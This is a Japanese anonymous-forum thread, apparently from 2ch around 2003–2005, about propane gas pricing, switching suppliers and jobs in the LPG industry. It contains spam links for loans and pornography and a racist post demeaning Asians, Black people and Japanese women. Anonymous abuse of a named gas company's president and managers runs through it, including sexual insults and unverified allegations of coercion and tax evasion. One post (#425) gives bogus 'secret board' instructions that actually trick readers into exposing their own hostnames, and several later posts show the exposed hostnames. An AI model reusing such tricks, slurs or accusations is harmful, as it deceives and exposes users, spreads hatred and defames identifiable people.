応援致します。全国どちらからでも即日銀行振り込み
致します。又、当社はキャッシングした事がバレない様
絶対秘密厳守です。
http://am1960.com/
携帯サイトからはhttp://am1960.com/i/
0266名無しさん@お腹いっぱい。
NGNG特に今自分が住んでいるアパートのプロパンガスって本当に高い。
そこは、岐阜県多治見市の中部プロパン株式会社というローカルな
ところだが、毎日お風呂しか使っていないのに(約20分)、
基本料金ー 1660円
使用料金ー 2545円
とかかっている。
基本料金は今まで使ったガス会社の中では一番高かった(約2倍)。
ちなみにパソコン、TV、エアコンとたくさん使っている電力のお金は、
この2倍すこしかかっているからだから異常だと思う。
ただ他のプロパン会社はまだそこまでかからなかったので、同じ地域に
住もうという人には気をつけたほうがいいと思う。
ちなみに私の階下の住人のだんなさんは中部プロパンに働いているらしい。
どうしてらしいと言うかというと、引越しのときに挨拶もしなかったから。
自分の会社では引越しの際は挨拶するように引越しマニュアルに記載している
だけに本当に驚いた。
0267名無しさん@お腹いっぱい。
NGNG>毎日お風呂しか使っていないのに(約20分)、
お風呂が一番、ガス使うから。
ガステーブルは左右バーナー及び魚焼きをフルに点けて
約8.5kW
16号単機能(落し込み)給湯器は
約35.0kW
要するに、16号給湯器を使うのは
4台のガステーブルを同時にフルに使うのよりもガスを消費する行為なんだよ
0268名無しさん@お腹いっぱい。
NGNG知恵と勇気と冒険心です。
果敢に未知なる世界に挑戦し続ける事です。
http://www.h2.dion.ne.jp/~achooooo/index.html
0269266
NGNG情報サンクス!節約の仕方が見えたように思います。ありがとうございます
(電気だと多分安いんでしょうね−以前お風呂の湯が電気というマンションに
住んでいたのでふと思ったのですが)。
0270名無しさん@お腹いっぱい。
NGNGコージェネとは、タクシーみたいにガスでエンジン回して発電し、排熱を給湯に使うシステムなんだけど。
細かい説明は省略するけど、ガス料金かなり安くするか、発電効率上げないと商売にならん。
LPガスの使い道は、料理と給湯しかないだろう、アーメン。
0271山崎渉
NGNG0272山崎渉
NGNGピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
0273tomoko
NGNG0274名無電力14001
NGNGhttp://www1.free-city.net/home/s-rf9/page006.html
0275名無電力14001
NGNG多分、下の階の従業員の部屋のガス料金は
貴方の部屋の料金設定よりかなり安いと思われます。
所謂、従業員料金というやつです。
基本料金1000前後、単価250位でしょう。
0276名無電力14001
NGNGいろいろケースがあって一概には言えないのでしょうけど、
やっぱ工事料金ってすごくかかるのでしょうか?
当方は大阪府高槻市JR沿線すぐそばで、地域外ではないと思います。
0277名無電力14001
NGNG0278あわび
NGNGhttp://yahooo.s2.x-beat.com/linkvp/linkvp.html
0279名無電力14001
NGNGhttp://coolnavi.com/tzone/
0280名無電力14001
NGNG0282三ツ輪産業
NGNG0283名無電力14001
NGNGガスって引くのに個人で負担するものなんですかね?
いや、水道もそうなのかもしれないのだけど、よくわかんなくて。
家の前までは公共で、そこから個人宅に引くのは負担という形?
0285名無電力14001
NGNGガス屋を変えました。どこに変えたのかと思ったらレモンガス
でした。んで実際レモンガスってどうなんですか?悪いウワサとか
あったりするんですか?
0286名無電力14001
NGNG0287名無電力14001
NGNGhttp://www.bi.wakwak.com/~murra/index.html
0288名無電力14001
NGNG供給先変えるのは面倒なんでしょうか?
料金安くなっても
デメリット多いですか?
そのあと勧誘がすごいとか。
0289名無電力14001
NGNG新築のお家だとがたがたいわれるけど、築15年たってれば問題なし
まあ5年位たってれば大丈夫だな。ガス屋に電話すれば負けてくれるよ
担当の営業の顔わかんないようなガス屋ならかえちゃえ
0290名無電力14001
NGNG元からの方から今までの設備費とか請求されたりするんですか?
0291名無しさん@お腹いっぱい」
NGNG0292名無電力14001
NGNGうちは築14年で
最初から同じプロパン屋さん使ってます。
供給先変えると面倒なことばかりでしょうか?
0293名無しさん@お腹いっぱい」
NGNG0294ガスガス
NGNGガスは安い方が良いに決まってる!!中身は同じだし!!
0295おいす!!
NGNGだよ!! 岩谷産業!!東部!!トーカイ!!ニチガス!!
が、よろしいんじゃないですか(^_-)その他は全然駄目!!
ボッタクリすぎ!!
0296名無電力14001
NGNG主導権握ってるのは普通
旦那?奥さん?
どっちが多いですかぁ?
0297たのメール
NGNG0298名無しさん@お腹いっぱい」
NGNG0299名無電力14001
NGNG元売って儲かっているの? 彼らは値段だけで売り込んで、阿呆なガス屋を飲ませるのが仕事のような気がしますが。
とはいえ、飲ませるのは日本特有の商慣習ですが、
誰か知ってる人、レスして
0300名無しさん@お腹いっぱい」
NGNGいるのか不安になるわいッ!
0301名無しさん@お腹いっぱい」
NGNG0302とも
NGNGhttp://s-rf9.free-city.net/page002.html
0303名無しさん@お腹いっぱい」
NGNG0304名無しさん@お腹いっぱい」
NGNGもいたッけ
0305名無電力14001
NGNG今までの判例と違うだけに、なんか動きがあるかな?
0306名無電力14001
NGNGお勧めは15本パックと7本パックですお好きな商品を選んでく
ださい!そして必ず金額訂正希望とコメントしてください。
http://www3.to/900yendvd
0307名無電力14001
NGNG切り替えされたら・・・
0308名無しさん@お腹いっぱい」
NGNG0309名無しさん@お腹いっぱい」
NGNG0310名無電力14001
NGNGこのレスを見ていると、斜陽産業だということです。
こんな業界には、見切りをつけて、ほかのレスでいい情報を見つけます。
さようなら
0311名無電力14001
NGNGボンベがレモンガ○でも、供給が「日本プ○パンガスセンター」になっていたら
途中解約は違約金5万くらい取られる。
確か裁判沙汰になったはず。
0313山崎 渉
NGNG__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
0314名無電力14001
NGNG0315名無電力14001
NGNGすっごい綺麗なおっぱい♪ピンク色のお○こも見どころ♪
http://angely.h.fc2.com/page004.html
0316名無しさん@お腹いっぱい
NGNG0317なまえをいれてください
NGNG貧弱で弱弱しく、アグレッシブさに欠け、醜いアジア人は黒人のストレス解消のいい的。
黒人は有名スポーツ選手、ミュージシャンを多数輩出してるし、アジア人はかなり彼らに見下されている。
(黒人は白人には頭があがらないため日系料理天などの日本人店員相手に威張り散らしてストレス解消する。
また、日本女はすぐヤラせてくれる肉便器としてとおっている。
「○ドルでどうだ?(俺を買え)」と逆売春を持ちかける黒人男性も多い。)
彼らの見ていないところでこそこそ陰口しか叩けない日本人は滑稽。
0318名無電力14001
NGNGつるつるオマ○コが見れたぁ!(*´Д`)<ここ最高ぉ!
http://plaza16.mbn.or.jp/~satchel/turuturu/
0319名無電力14001
NGNGって事はないですよね・・・
0321名無電力14001
NGNGhttp://life2.2ch.net/test/read.cgi/kankon/1059631235/
只今調査中。。協力してください!
0322名無電力14001
NGNGその2年後に、ずっと安いところに替えたんだけど、それでも請求は
来なかった。後の業者さんに聞いたら、前の業者は料金取りすぎてたから、
十分ペイしている、気にするなと言われた。
0323名無電力14001
NGNG何故、違約金を取るんだ?おかしいだろ?
0324名無電力14001
NGNGガス量が増えているようであれば、ガスメータを疑え
0325名無電力14001
NGNG無料画像でも十分ボッキもの!
一見の価値あり!!
http://www.pinkfriend.com/
0326ぼるじょあ ◆ySd1dMH5Gk
NGNGピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
0327名無電力14001
NGNG0328名無電力14001
NGNG/iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
iiiiiiiiiiiiiiiiii/ \iiiiiiiゞ
iiiiiiiiiiii/ \iiヽ
iiiiiiiiiiiiiii《 ━━━'/ ヽ━━━ ヽミヽ
...iiiiiiiiii彡/ __,.:: :: __ ヽiiiii|
..iiiiiiiiiiiii》| ::: |iiiii|
iiiiiiiiiiiiiiii|, |iii|
..iiiiiiiiiiiiiiiiii, ( ● ● ) .|iiii|
iiiiiiiiiiiiiiiiiiiiiii 》━━━━《 |iiiii|
iiiiiiiiiiiiiii《《《ヽ 》 / ̄ ̄\ 《 |iiiiiiii|
iiiiiiiii《《《《《《《《 《《 \ ̄ ̄/ 》》 |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》  ̄ ̄ 《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
0329名無電力14001
NGNGあなたは、どうですか?まみじゃだめですか?(。;_;。)
私、ここであなたのこと待ってます http://www.gals-cafe.com
二人だけで、一週間毎日10分。一緒に過ごしてくれませんか?
勿論それ以上も・・・。だってまみ、あなたにひとめぼれなんだもの。
待ってますね。必ず、来てくださいね!(*/▽\*)
0330山崎 渉
NGNG│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
0331名無電力14001
NGNGニチガスと昭和瓦斯実業から内定を出てるのですが
どちらに入ろうか迷っています。
ニチガスはナチガスと言われたりしてあまり評判が芳しくないようですけど。
HPの社長の写真をみて昭和に惚れ込んでいるので昭和にしようかとも考えています。
裏事情知っている人いましたら教えてください。
0332名無電力14001
NGNGそもそも明細に基本料金と従量料金の区分けすらないからね
今時、客を舐めてるとしか言いようが無いね
オイ、エス○○商事、いいかげんにしろよ
まあ計算すれば、すぐ出るんだけどさ
基本1800円、従量:335円/m3
高いんだけど、賃貸だから変更できないしね、しばらくは我慢するわ
もうすぐ家を建てるけど、もちろんプロパンは使いません
オール電化は少し怖いんで、IH+灯油ボイラーでいくことにしました
もう少し安家りゃガスで料理したかったけど、ばからしいのでIHにしちゃった
0333名無電力14001
NGNG今までの学費をドブにすてるようなもんだな。
0334名無電力14001
NGNGゲラゲラ
0335名無電力14001
NGNGあ、それは兵隊の方か。日曜の求人に出てるやつ。
「LPGをPRする仕事です。会社に出社する必要はありません」てやつ。
0336名無電力14001
NGNGオール電化にするとその工事業者と電力会社からLP業者に裏金(保証金)が
支払われるって聞いたんですが本当ですか?いくらくらいですか?
きっと工事代に上積みされちゃうんでしょうね。
0337名無電力14001
NGNGそんな話聞いた事無い。
LPG〜都市ガスにする場合は保証金が発生するが。
0338名無電力14001
NGNGhttp://job7.nikki.ne.jp/bbs/200304140303197280/
0339名無電力14001
NGNGコラコラ・・・そーゆーあなたの学歴は?
0340名無電力14001
NGNG0341bbb
NGNG/ ´_ゝ`)
| / <ちょっと通りますね、ここ通らないと行けないので・・・
| /| |
// | |
U .U
0342名無電力14001
NGNGそいつの奥さんブスそ〜、ブッ
0343AAA
NGNGTプ●パン酒井▲◎★7を6軒喰ったよ〜
レ◎ン
0344名無電力14001
NGNG0345名無電力14001
NGNG新聞の折込チラシを出すことは
あまり利点はありませんか?
教えてください♪
0346名無電力14001
NGNG出しなさい、ほかと比べられてやすーいガス器具を売る気ならね。
高い広告費出す余力があるならね。
ところで出して何をしたいの?
0347名無電力14001
NGNG差別対価の大手にダメージを与えられんかね?
吹っかけてる既存顧客の料金を下げざるを得なくなり、新規
顧客のほうも、あまり極端な料金設定は出来なくなるのでは?
もちろん自社の価格をそれなりのものにしなければならんが。
0348名無電力14001
NGNG金が動くのは、
電力会社→工事業者です。
電力開発促進費とか協力金などの名目で、
1件につき数万円単位。
建築業者がこれをすすめるのも、これが大きいという面もある。
マンションをオール電化で建てようものなら、
数十万〜数百万の金がもらえるようです。
LP業者はもらえたとしても、配管の撤去費用ぐらいかな。
0349名無電力14001
NGNG0350名無電力14001
NGNG半月ほどで以前の倍の値段になってしまった。
前はシャワーで済ましてたのが週に2回ほどは風呂になったので
使う量も増えただろうけどさ、やっぱ高いよね〜(;´д`)
0352名無電力14001
NGNG料金割り増し時間があるのが納得いかんのだけど。
0353名無電力14001
NGNG0354名無電力14001
NGNG|:::::::::::::;;;ノ
|::::::::::( 」 <あっちこっちにレスする「教えてクン」の
ノノノ ヽ_l 名無しは「無視」&「放置」(プッ!
,,-┴―┴- 、 ∩_
/,|┌-[]─┐| \ ( ノ
/ ヽ| | 必 | '、/\ / /
/ `./| | 死 | |\ /
\ ヽ| lゝ | | \__/
\ |  ̄ ̄ ̄ |
⊂|______|
0355名無電力14001
NGNG半年くらい前から松島ガスってとこが、
基本料金 \1000の 立米\160
てな料金で荒らしまわってます。
この料金みなさんどう思われますか?
ちなみにこれ、ニチガスに対する報復らしいんですが
ここのガス屋、頭大丈夫なんでしょうかねぇ
0356名無電力14001
NGNG助けて下さい。
0357
NGNG0359名無電力14001
NGNG内定辞退とかできるかなあ
0360名無電力14001
NGNG0361名無電力14001
NGNG0363名無電力14001
NGNG個人商店は押さえではじめだけ安くてすぐ値上げ!
なんて勝手なことばかり!!すぐに転売するところがあるから
仕事がやりにくくて。客はお得意様だから替えれないだって。
あなたがバカなお得意様なんでしょと言えない自分が悔しい〜
0364名無電力14001
NGNG0365名無電力14001
NGNG0366名無電力14001
NGNG0367名無電力14001
NGNG多摩地区にまたくるぞ
0368名無電力14001
NGNG買えといってきました。
まったくろくなもんじゃねーな、どうしようもねえぎょうかいだな
とあらためておもいました。
0369千葉県弱小販売店
NGNG久しぶりにトータルにやられました
真っ当な営業かけて切り替えるんならいいけど
うちを悪徳業者のように吹聴して歩くのはやめれ
0370369
NGNG0371名無電力14001
NGNGだったゾ、家庭用のLPGと偉く価格差がないか?
0372名無電力14001
NGNGPかBかも確かめたか?
それから40円/dで出せる業者なんか、
日本はおろか産油国でも無理だ。
40円/`で出す必死な業者はいるかも試練が…
売るたびに赤字だからそのしわ寄せは社員に(ry
過疎ってるからsageとくよ
0373名無電力14001
NGNG教えてください
0374名無電力14001
NGNG>日本はおろか産油国でも無理だ。
そうか?年間1万トンのユーザーで40円で買ってるって
豪語していたぞ。近くの他の会社でも45円っていうとこ
ろもあったぞ
まあ、アホな業界だと思うけどね
0375名無電力14001
NGNG関東経済産業局(局長:高橋武秀)は、平成16年9月14日付けで、LPガス販売事業者
(関東経済産業局登録)の株式会社昭和瓦斯実業(千葉県市川市、代表者牛尾 健)に
対し、液化石油ガスの保安の確保及び取引の適正化に関する法律(昭和42年12月28
日法律第149号。以下「液石法」という。)第16条第2項(液化石油ガスの保安の確保及
び取引の適正化に関する法律施行規則(以下「液石法省令」という。)第16条第1項第
15号の2)違反(無断撤去禁止違反)の事実を認定し、液石法第16条第3項の規定に基
づき、販売方法の基準に従ってLPガスの販売をすべき旨を命令する行政処分(基準適合
命令)を行いました。
http://www.kanto.meti.go.jp/press/20040913lpg.html
0376名無電力14001
NGNGDQN!
0377名無電力14001
NGNG0379名無電力14001
NGNG0380名無電力14001
NGNG生き残るのは昭和だろうね
社長が他の会社とは違うよ
一流の男は会社も一流にするっていうことだろうね
0381名無電力14001
NGNG0382名無電力14001
NGNGhttp://money3.2ch.net/test/read.cgi/seiji/1049103440/l50
0383名無電力14001
NGNGいよいよXデーは近いかなw?
ついに昭和瓦斯が狙われた
http://society3.2ch.net/test/read.cgi/atom/1027737162/l50
昭和瓦斯実業
http://society3.2ch.net/test/read.cgi/atom/1054127043/l50
0384名無電力14001
NGNGhttp://society3.2ch.net/test/read.cgi/atom/1027737162/452
0385名無電力14001
NGNG0386名無電力14001
NGNGここにも名前が出てるとは・・・・・w
あの馬鹿は、部下に逃げられ嫁にも逃げられてもまだわからない愚かな男。
0387名無電力14001
NGNG基本的には都心のプロパン屋も東京ガスなど都市ガス会社の小会社が行っている
純粋なプロパン屋は都市ガスの供給のまるっきり無い山岳などに多い
ただ大体東京ガスなどの小会社化されているが
東京ガスにとってもこのご時世都市ガスからのもうけだけではなく
プロパンからも儲けようとしている訳
0388名無電力14001
NGNG昭和ばかりが叩かれてるけど唖家須も似たようなもんだろ
あんなヤツを志典庁に置いてるようじゃな
0389名無電力14001
NGNGhttp://society3.2ch.net/test/read.cgi/atom/1100352706/
0390名無電力14001
NGNG会社の近くにすんでいる経理課の社員に夜中に電話して
金庫から金を出させて飲みに行く管理部長とかいろんなのがのさばってるらしいよ。
確かに笑羽と同類だなw
0391名無電力14001
NGNGソフトバンク、ライブドア、楽天なんて足元にも及ばない
http://society3.2ch.net/test/read.cgi/atom/1054127043/l50
0392名無電力14001
NGNGろくな企業ないようですが・・・・・
0393名無電力14001
NGNG学生の就職したい企業ナンバーワンになったそうです
さすが、昭和瓦斯実業!
0394名無電力14001
NGNG祝!4期連続新卒入社ぜんめ〜〜つ!
退職率ナンバーワン。学生諸君、実際、確認してみな。
さすが、昭和瓦斯失業!
0395名無電力14001
NGNGいい業界ですよ。
その代表が昭和瓦斯実業!
0396名無電力14001
NGNGどこがいいのか?具体的に言ってみ。
おまえ言えねぇだろ。
0397名無電力14001
NGNG何も言わずにこれを見ろ
どうだ、文句ないだろ?
プロパンガス業界のぺ・ヨンジュン
http://www.sun-living.co.jp/president4.jpg
0398名無電力14001
NGNG0399名無電力14001
NGNGようこそプロパンガス業界へ!
素晴らしい企業がひしめき合っていますよ!
0400瓦斯凡人
NGNG昭和瓦斯実業は噂とは全然違っていい会社です。
管理職の一部の人は尊敬出来ませんが牛尾社長は尊敬出来ます。
どうか騙されないで下さい。
0401名無電力14001
NGNG尊敬できるのは牛尾社長だけではありません!
超一流会社昭和瓦斯実業は管理職全員尊敬できるそういう会社なんです。
この立派な会社で管理職になる、そういう人間ですよ。
素晴らしい人間に決まっているじゃないですか。
0402名無電力14001
NGNG川 \
川 川川川
彡 Χ ) / ̄ ̄ ̄ ̄ ̄
彡 ∀ ∀ | < 飴くれ
∂彡 (σ σ)\ \_____
彡彡∵丿 ‖ \:)
彡彡 Д 丿
彡彡 丿
 ̄ ̄ ̄ ̄
0403名無電力14001
NGNGあ〜〜、わかった!
AKIMITUだ〜〜。
0404名無電力14001
NGNG毎日、黒いげん茶利で立川から通ってます。注意しましょう!
しかし、M石もとうとう切替業者に落ちぶれてしまい、かわいそうに
0405消費者A
NGNG切り替え自由って言っときながら嘘ばっか
0406名無電力14001
NGNG0407名無電力14001
NGNG0408名無電力14001
NGNGHPの社内行事を見てぜひこの会社に入社したくなりました
子会社のサンリビングのHPの社長の写真を見てぜひこの社長の元で働きたくなりました
初恋の人にやっとめぐり合えた気持ちです
0409名無電力14001
NGNGマルチDQNのしわざか・・・
0410名無電力14001
NGNG今年で辞めるからいいけど。
だまされた。
0411名無電力14001
NGNG風俗狂い 変態野郎
0412名無電力14001
NGNG管理部長のこと?
0413名無電力14001
NGNGアホは、尾乃と借家!!
最悪は、葉意字間様!!
論外は、気無裸!!デブ3世!!
0414名無電力14001
NGNGどけ、どけ、脳図家様のお通りだーい!
小泉首相も認定!国家表彰授与!
AFO!!
0415名無電力14001
NGNGS和の♀ってヤリ穴だらけだぜ!
大漁、大漁!!
心配すんな、牛犬は忙しくて、ヤリ穴掘ってねーから!!
ただし尾乃と課他汚蚊とは、ヤリ穴兄弟ーーーー!
0416名無電力14001
NGNGまじな話し、牛犬はAFO!!
サンリビングのHPの社長の顔、これが牛犬。
口癖は「アロハ」。 こんな人と会話できませ〜〜〜ん>>>
0417名無電力14001
NGNG展示会に来て、自分でおでん食うな!
お前は客か!!
0418名無電力14001
NGNG欲が深いからだな!
愛絵巣が委託を受けなくなったらどーなるんだ?
両方、倒産か?
0419名無電力14001
NGNGなむさん、なむさん>>>
0420名無電力14001
NGNG詳しく教えろ!!
0421名無電力14001
05/01/19 01:23:53彼は人格者だから、それは順当な人事
ただ心配なのは傷羽蛾筋次ョ迂にヘッドハンティングされないかということだ
ttp://society3.2ch.net/test/read.cgi/atom/1013867964/385
0422名無電力14001
05/01/20 04:42:100423名無電力14001
05/01/22 01:16:23逆立ちしたって傷羽(小和)に行きたいヤツなんてこの世にいません。
だから・・・自作自演の牛汚犬。残念!!間違いない!!!
おまえはホントうざいよ!
0424名無電力14001
05/01/22 12:28:38蜜遺って
社員の前で夫婦喧嘩する営業部長がいる会社の視点腸のこと?
0425名無電力14001
05/01/23 10:19:12108 :瓦斯凡人:05/01/21 22:09:32
裏2ちゃんの入り方、見つけてきたよ〜
貼り付けしときますね〜↓
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、20歳以下なら low 21〜30歳は middle 31歳以上は hight と入力します。
(年齢別調査。)
3.本文にIDとパスワードの motenai を入れて(コピペも可)、書込みボタンを押します。
4.タイトルが「一流企業(笑)」に変わればOK
5.サーバーが重いと2chに戻ってくるけど、くじけずに挑戦。
うまく行くと、目的のページにつながりますです。
6.家庭の電話やADSL回線よりも、企業や学校の専用回線やCATV回線からの方が
サーバートラフィックの都合上つながる確率が高いですよん。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!
http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になりますです。入り口は「表2ch」のCGIだけです。
0426http:// q049253.ppp.asahi-net.or.jp.2ch.net/
05/01/23 10:47:3904272ch
05/01/23 15:08:0504282ch
05/01/23 15:09:3304292ch
05/01/23 15:10:370430名無電力14001
05/01/23 19:02:23いい情報!サンクス!けっこうおもろかったよ(笑!もっと早く教えてくれればよかったけど。
0431http:// i60-34-241-178.s02.a014.ap.plala.or.jp.2ch.net/
05/01/24 10:16:030432名無電力14001
05/01/24 21:33:38125 名前:名無電力14001 :05/01/24 17:42:23
>>108 オマイ!パスワード違うぞ!バカタレ!!!!
みんなを騙しやがって!!!アホツ!氏ね!!!「remote」じゃねーかよ!
何が「motenai」だよ!!!モテないのはオマイのその顔だツ!アフオ!!!
0433http:// d155.GtokyoFL64.vectant.ne.jp.2ch.net/
05/01/25 16:16:130434名無電力14001
05/01/25 20:29:12<732:裏名無電力14001 :05/01/25:19:23
<残業手当てはいくらやっても一緒でしたし、休日出勤手当てなんて
< ありえません。
<
(*⌒m⌒)ぷっ
0435http:// YahooBB219016171198.bbtec.net.2ch.net/
05/01/27 01:50:050436http:// YahooBB219016171198.bbtec.net.2ch.net/
05/01/27 01:51:550437http:// YahooBB219016171198.bbtec.net.2ch.net/
05/01/27 03:06:320438名無電力14001
05/01/28 18:46:45私は残業手当も休日出勤手当も頂きました。
書き込みするのは初めてですが、自作自演の寂しい人生はあなたですね。
哀れな人ですね。
だからT社やN社にあんなに沢山取られてしまうのではないですか?
0439名無電力14001
05/01/28 20:09:05:名無電力14001:05/01/28 18:46:45
>>>434
>私は残業手当も休日出勤手当も頂きました。
>書き込みするのは初めてですが、自作自演の寂しい人生はあなたですね。
「頂きましたって」あんたどこの会社の人?プツ!
ちゃんと答えろよ。キチガイなヴァカクン。
0440名無電力14001
05/01/28 20:28:30あなたの相手はしません。
大体あなたが誰だか解りますから。
最低な人だとしか思ってません。
さようなら。
0442名無電力14001
05/01/29 21:05:020443晒しあげ
05/01/29 21:45:11>>440の>>442タン!
自演のヴァカクン!必死ですね(笑)
ついでに ? 「だからT社やN社にあんなに沢山取られてしまうのではないですか?」
T社やN社・・・・( ゚д゚)ポカーン
0444名無電力14001
05/01/29 22:58:510445名無電力14001
05/01/30 00:26:470446名無電力14001
05/02/01 20:53:17>常識で考えて下さい。あなたは、自作自演の寂しい人生ですね。しかも
哀れな人ですね。
(・∀・)ニヤニヤ
0447名無電力14001
05/02/08 23:45:52これ、マジだべさ!
0448名無電力14001
05/02/09 00:10:280449ガス命
05/02/09 00:21:36それがI社の社員か契約ブローカーかはわかりませんが。
いずれにしてもI社長の指示ではないでしょうか!
0450名無電力14001
05/02/09 00:45:42ホテルの入り口で断りましたが結局関係をしてしまいました。
それは、正社員になりたかったからです。
U社長に携帯でご家庭のことを話してましたが、すべて嘘です。
そして、生理がきません。
それ以来は体だけの関係が続いています。
どうせ、U社長は相談しても、Y本部長を信じると思います。
許せません、絶対に!
0451名無電力14001
05/02/09 01:04:10それは俺様も初耳だ!
詳しく教えろ!
教えたらイカセテやるからよ!
0452名無電力14001
05/02/10 10:59:30管理職のみなさん、死んでください
0453名無電力14001
05/02/10 16:26:19つまんね。 3点
0454名無電力14001
05/02/11 02:49:17だって兄弟になるか、どうかだから
0456名無電力14001
05/02/14 20:33:230457名無電力14001
05/02/14 20:46:000458名無電力14001
05/02/14 21:03:250459名無電力14001
05/02/14 21:18:55>458
注意しろ!
試されてるぞ!
0461名無電力14001
05/02/15 17:56:40族上がりの蜜異も終わったか・・・
0462名無電力14001
05/02/15 18:20:59おばさんだけどな、さすがバカ丑だ!
0463名無電力14001
05/02/15 18:33:16書きこよりも儲かるだろ!
0464名無電力14001
05/02/15 18:58:10おまえなんかになにがわかるんだ!
金だよ、金!
豚どもにヤザワなんか行かすより金なんだよ!
0465名無電力14001
05/02/15 19:03:090466名無電力14001
05/02/15 19:07:22豚とつるんでな!
わかったか、バカ丑!!
0467名無電力14001
05/02/15 19:29:470469名無電力14001
05/02/15 19:44:44見苦しい・・・
0471名無電力14001
05/02/16 01:09:390472http:// 2027156083.warabi.ne.jp.2ch.net/
05/02/16 18:14:390473名無電力14001
05/02/18 18:16:13つまらん
ピル以外を書け!!
誰も信用せんだろ!!
そんなの持ってても意味ないじゃ〜ん!!
Afo!!
0474関東人
05/02/18 18:20:57許していいのか!!
0475名無電力14001
05/02/18 18:45:13福島も戦場になるのか?
0476名無電力14001
05/02/18 19:00:28所詮T会はそんなもんだ!
悪すぎ!!
0477名無電力14001
05/02/20 03:11:51調べたら本当じゃあねーか!
裏金だな!!
俺たちのなけなしの税金でよ!!
0478名無電力14001
05/02/20 03:31:300479名無電力14001
05/02/20 03:47:47助けて下さい。
もう中絶は嫌です!
0480名無電力14001
05/02/20 04:07:590481名無電力14001
05/02/20 04:23:01糖尿の豚密はバイアグラで逝ってよし!!
0482名無電力14001
05/02/20 04:44:46落ちる一方だ。
これでいいにか?
0483名無電力14001
05/02/20 04:57:33今日も中出しされました。
危険日って言ったのに全然聞いてくれません。
毎日が地獄です。
0484名無電力14001
05/02/20 05:09:39脱税!
0485名無電力14001
05/02/20 05:16:23あーわかったー他毛宇地だー!
0486名無電力14001
05/02/20 05:22:49S和の豚クラブ!
社員は全部借家!!
0487名無電力14001
05/02/20 05:32:08お前が次の総理大臣だ!
0488名無電力14001
05/02/20 05:44:15豚で日に居る冬の虫!
すげーばか!!
ざまーみろ、牛汚の金で返しなさい!!
0489名無電力14001
05/02/20 05:52:35勿論、水戸流!!
0490名無電力14001
05/02/22 00:54:02>483
それからどうしたんだ?
何回やったんだ?
Yのイチモツ情報を教えろ!!
飴やるからよー!!
0491名無電力14001
05/02/22 06:40:480492名無電力14001
05/02/22 19:22:38詳しく詳しく教えろ!
0494名無電力14001
05/02/22 20:39:30続き
カリ無し!臭い!豚のシッポ!キモイ!
049554877
05/02/22 22:48:31この資格をもっていると大手のガス屋に転職とかできますかね?
当方は従業員3人の弱小営業所に勤めていて転職を考えているのですがこの資格の使い道
が全く分からないのです。
0496名無電力14001
05/02/23 12:06:16簡易ガス供給やってる会社で必要
(供給規模に応じて何人か選任しなければならない)
しかし丙種なら持ってて当たり前の資格
転職(移籍?)したいなら甲種がんばって取るといい
0497名無電力14001
05/02/23 18:14:44そんな会社 さっさとやめちまえ!
0498名無電力14001
05/02/23 18:37:29今夜部屋に居ろと言われました。
生理中なのに・・・
S・O・S
0500名無電力14001
05/02/24 01:12:13なんかあそこが痒いんですが・・・?
0501名無電力14001
05/02/25 01:34:430502真実
05/02/26 01:27:350503名無電力14001
05/02/26 02:18:32一人三役目か
天才だな 乙乙乙w
0504名無電力14001
05/02/26 03:23:32淋病・・・
私はどうなるのでしょうか?
Y澤はのうのうと生きてていいのでしょうか?
0505名無電力14001
05/02/26 04:19:230506無免許逮捕男
05/02/27 02:45:11byあいわわ
0507名無電力14001
05/02/28 20:17:23100 :倒壊太郎:05/01/30 21:06:16
業績悪化の為、冬のボーナスは全額でなっかたらしいですね。
もうすぐ倒産ですかね…。
101 :名無電力14001:05/02/28 08:10:47
0508名無電力14001
05/02/28 21:28:25雄科ちゃ〜ん、自演だーいすきにょろw
ビルオッタテタカ〜
AFO!!
0509名無電力14001
05/03/01 02:53:41雄科チン ツーケーの穴ナメナメされるとすぐにピュッ
正解だがな〜www
0510水戸市民
05/03/01 05:13:200511名無電力14001
05/03/01 21:40:09春日部の方がもっと駄目だろ!
族上がりを自画自賛してる[I社]のM異もいるしな〜
[H社]も暴れてるしよ〜
どんぐりのせいくらべw
0512真実
05/03/02 00:00:01うらやましい・・・
0513名無電力14001
05/03/02 00:43:58画像が 画像が 見たーい!
どうしても見たーい!www
0514名無電力14001
05/03/02 22:05:00あいわわのならあるぞ 欲しいか?
酒吹き出すと思うが・・・・・w
0515名無電力14001
05/03/02 23:21:01後はいもずる式になるかUがやるかだな。
0516名無電力14001
05/03/03 15:53:490517名無電力14001
05/03/04 02:19:160518名無電力14001
05/03/04 19:29:17悪は滅びるのら〜www
0519名無電力14001
05/03/04 19:57:220520名無電力14001
05/03/04 23:54:350521名無電力14001
05/03/05 00:17:560522名無電力14001
05/03/05 00:24:050523名無電力14001
05/03/05 00:40:180524名無電力14001
05/03/05 02:07:350525名無電力14001
05/03/05 16:29:340526名無電力14001
05/03/05 18:02:360527名無電力14001
05/03/05 23:35:570528名無電力14001
05/03/05 23:45:430529名無電力14001
05/03/06 01:22:090530名無電力14001
05/03/06 01:56:55気を付けろ!
0531名無電力14001
05/03/06 16:54:13よっちゃん=ピル
ただの私怨w
0532名無電力14001
05/03/06 17:30:38お金の取り分で低次元な争いをしてるみたいだね。
0533名無電力14001
05/03/06 19:39:30憂さ晴らしに2ちゃんだもんな・・・
0534名無電力14001
05/03/07 01:34:380535情報
